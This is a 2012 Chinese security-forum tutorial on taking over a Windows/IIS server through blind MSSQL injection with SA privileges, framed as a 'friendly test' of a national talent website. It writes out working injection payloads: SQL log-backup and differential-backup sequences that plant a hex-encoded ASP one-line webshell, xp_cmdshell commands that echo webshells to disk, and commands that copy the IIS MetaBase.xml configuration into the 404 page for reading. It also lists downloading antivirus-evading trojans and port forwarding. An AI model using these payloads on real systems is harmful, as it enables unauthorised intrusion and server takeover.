找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
返回列表 发新帖
查看: 2696|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
; A  r6 {% {9 e+ R/ g. F  c
5 F* U5 H' W, H( J; V
$ g* w9 N5 ^" u9 R                                                             欢迎高手访问指导,欢迎新手朋友交流学习。0 S% z4 V" s3 g, x% J
# e. T% t7 l5 A9 B8 z6 H! z
                                                                 
0 W" I" C7 l0 \6 w4 B7 _                                                                 9 X- e  Z- _6 E: h7 l" H* ]$ P
                                                                  论坛: http://www.90team.net/
; c  [# A1 |4 s6 J7 X9 |
1 I$ g; o% A( C: X) p3 ^; E
8 G1 O2 ~- w2 E) @/ f4 ^; O1 U- P
友情检测国家人才网
1 i  Z  F7 c3 y; ?1 K9 ?5 m/ v
3 t: `! f3 X# M/ S" e* G+ Q0 o+ b6 n: s4 a" d
内容:MSSQL注入SA权限不显错模式下的入侵
; ~- w+ Z( x# b0 g4 P/ s& ]* F
. e0 M/ E4 r9 z+ Z/ l9 O  G" K4 X# ^4 V# C" `9 r2 ^
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。! y7 c  t5 H- X9 N' h

. U/ D5 g% A+ ~( X9 Y2 c我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。  }2 r: p9 s. g+ r3 I4 N; H

9 P- d+ N8 x2 T9 Y: P9 S- t0 r2 p9 `" b1 s- J- m9 V- O$ r9 r
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
' I2 Q, Q. ?* j' O8 m) L& b: M, v9 t" n8 ^7 d, V1 T
思路:. e7 T7 R- A; b5 S% y6 J" Z+ p

: Y; R/ f3 C5 v2 B( \首先:
) W, c* }) q' ]+ \
1 N* q) ~: V& F( E, j& ?通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
+ N0 r, ~6 U( K
& w7 [2 H" ~' Z: B; |9 l1.日志备份获得Webshell) }" w' i7 p# Q
9 q4 R4 d& N) g1 P% R. e! X
2.数据库差异备份获得Webshell
9 a3 H" n( c& y# ]# y: y6 L2 Y  n
3 H* g3 W# P& e. X2 Y+ D4.直接下载免杀远控木马。
6 S6 o8 b6 ]+ }$ l* T2 O1 f/ b# a% f# p6 L  Y# W* Q
5.直接下载LCX将服务器端口转发出来
* w. j2 R/ d8 ?% u
( T! l$ z) g& d% C% q9 U4 }6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。1 n, f7 b# l1 s- R
; X% L8 @0 ~1 G9 _, Y) I) U

3 f" d( ~! ^  W
3 e: ]) z' i9 D9 A) D$ b9 m5 a在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 7 T. ~5 A4 o" z& ^5 [8 T/ B

3 }1 Z  B" T% F% N" J0 Y8 O我直接演示后面一个方法8 [' Y4 I1 ~( j' p6 `. G

7 F0 M; Y; [3 w. ^) i( a) q0 ?
5 X" Q( Y0 e9 N! X分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL - Y1 X2 J; ]% j

; ?" A9 b; i; l6 ~! Z0 a# D, c: Q' _! H7 N9 E# W2 H/ x! a
- g- W: s* ]) t6 m3 i; a) _
$ y5 \* v0 g$ A! M- w" I
◆日志备份:# t! \9 U8 U2 J! `4 S3 _

6 y6 o+ M6 p9 G* F
- c4 W. W' b) H$ D. A) W8 G6 J1. 进行初始备份1 e. u; [6 B7 K, A1 ~7 K
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
% B- t. v% \4 G, R9 \0 {  [/ U- |. k8 F, _- B
2. 插入数据# ?6 ]9 ~) X3 T
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--6 Z5 g! P9 E1 E2 B! ?, ~8 R6 X8 o/ j$ }
4 g- J/ x* K% u2 E
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>: U* v! ?  v) o. T3 Y
  
1 R3 l0 j" w4 L7 x3. 备份并获得文件,删除临时表2 H9 W% E+ L( h) a
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--: x2 `9 F; F( t( G7 ^

0 {8 I5 S: _; g7 ~; Q; F# q/ H: H& R# n3 E6 G- b

; w6 ?- {2 v* o! t" X, w◆数据库差异备份# N% w% J) [2 G) Q1 G% b0 x1 B; K1 c$ l
: ]  Q7 k* Q+ q/ w. I! e* }
(1. 进行差异备份准备工作
/ b! s7 E, l5 i7 q) V1 Z5 I0 H
. f1 n. e# a8 h" R2 J;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--8 e, I- v, G0 e! i5 k3 X
) n5 e9 x/ k3 h0 P0 c6 a, ~& D/ \
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
$ Q- Z$ K# f( u8 j9 m" A # x8 _) e8 M! R3 H6 f

* G, K; y- ]2 {" U(2. 将数据写入到数据库' l1 `0 C- o. u5 U3 x6 i2 }
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- $ t$ L0 e1 i5 M- A& b- F
+ M, H3 k1 v. }% k$ \+ z0 `
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 p+ G( e0 ?) n2 n  p' y" q- d
3 d, B2 B% B- h: B3. 备份数据库并清理临时文件1 i0 U  C  l8 w6 M6 y. q

# b( Z9 i3 r. p; j;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
7 G. K9 _( K5 B3 v- T6 i
  ^7 \& P# g) j0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ' u5 r; L' V' }1 P" X

8 S$ y$ x3 v) D$ ~& ?# X' `+ s/ r1 X: B
2 m5 @$ R1 m+ Y7 C1 j5 o' P
用^转义字符来写ASP(一句话木马)文件的方法:   
! s0 V9 R; B1 c! T
, ^5 a8 a! B3 Z4 H1 ]; E* s1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
8 ?0 g# B# z$ s  g3 g/ x/ A. ^; x! U$ n5 c6 q/ ~
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 1 V, d# h( u. w1 Q0 K9 w& S8 x

# f3 _) @! T, s读取IIS配置信息获取web路径( V9 ?* }4 Y6 T! x1 b- G
5 o2 h+ T$ U+ p+ X2 }
     - j/ d, P+ w1 o1 h) h& I
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% b  }  a5 }) ~) c# R

3 l9 I4 Z1 f7 c执行命令
# m8 w$ e! m/ m/ F     
- ?' H% i1 A3 `( p# V- v# s, \. }     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--+ ?& _: q' t. r. k/ [- d, R
/ ^4 O: l4 x" R# m$ E) h
9 z, `1 l* ~) ~; D6 S$ z
8 B& B& w% q' B/ M  ^) N1 Q( B: c
0 z5 D1 T9 I0 I6 U. s9 Y
; N! R% K- j; h" [- ?
9 p9 q, T% T0 b! d
- k9 s" g5 R  P  `

2 B8 `  @6 z4 ~) j- V* g8 ~0 X) A5 H* m

2 n0 T  S$ Q9 P: V  c  G4 g( A
6 s7 a0 M! V; ]) s
7 }3 w# d* m& G8 Z0 e, u1 w- B0 T* Y' ~+ ?( H% l& w
* u! H- F8 g9 V, r$ {& B

+ K; Y9 h' y7 l7 ?  O4 B' p$ k8 ^* i# ?, h) H& o' G
1 C, ^4 Y! }6 k2 @7 a: u

, i$ L7 H/ A, @) Y3 U  t/ V. L, d  K! _& {4 n. ^
: {" i+ R/ P) l3 z1 o
* r' [' L% e& O
3 A  @& g  F3 V+ F8 t. k2 _" T- i

% o$ A7 \) I" g' Q% \' g5 q9 w- s1 P( f7 L  E% P. y

( k# G% F2 V0 U; D* s1 B' x- S, s6 ]5 i7 y0 W

, F; a, f0 ]+ o  X, K; h! j
6 M) \6 E9 P' H+ s" b( i& ~2 D7 y8 ]2 \* i+ l
' E' m* }  T. V( S2 B6 F0 V
7 W+ \( k  j; b: l
; N4 Q; e3 S0 f4 A3 _$ w7 K* p

5 k6 H% M( p3 s' y0 b0 x4 Y9 ^, a6 T( R0 ^3 [; J
" D* N' [3 ~; Q: a8 M8 Q% N! j8 p2 F

- a; M; c. i" c6 r' o7 \! H' }  S: E6 Q2 R/ P3 w
. s9 t( r) @0 c$ G' H% o. {' k

* S9 q) o! |2 e) t0 k3 U! d, w/ j6 u0 y$ c3 g$ B
( G" C7 g6 K( W# X' T# R2 Z
* Y7 O+ k6 m2 j4 Z# `5 W: _

/ r( I0 u" ]- p/ B9 c6 m& a0 l2 U9 x2 V

' _  Z/ O4 Z! U, {8 X6 T
. d9 n( k7 J4 d& W4 o+ Z
4 I9 d2 t4 `% V% `# S, P
' h5 A/ L& r0 O+ g+ c" j) |+ z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表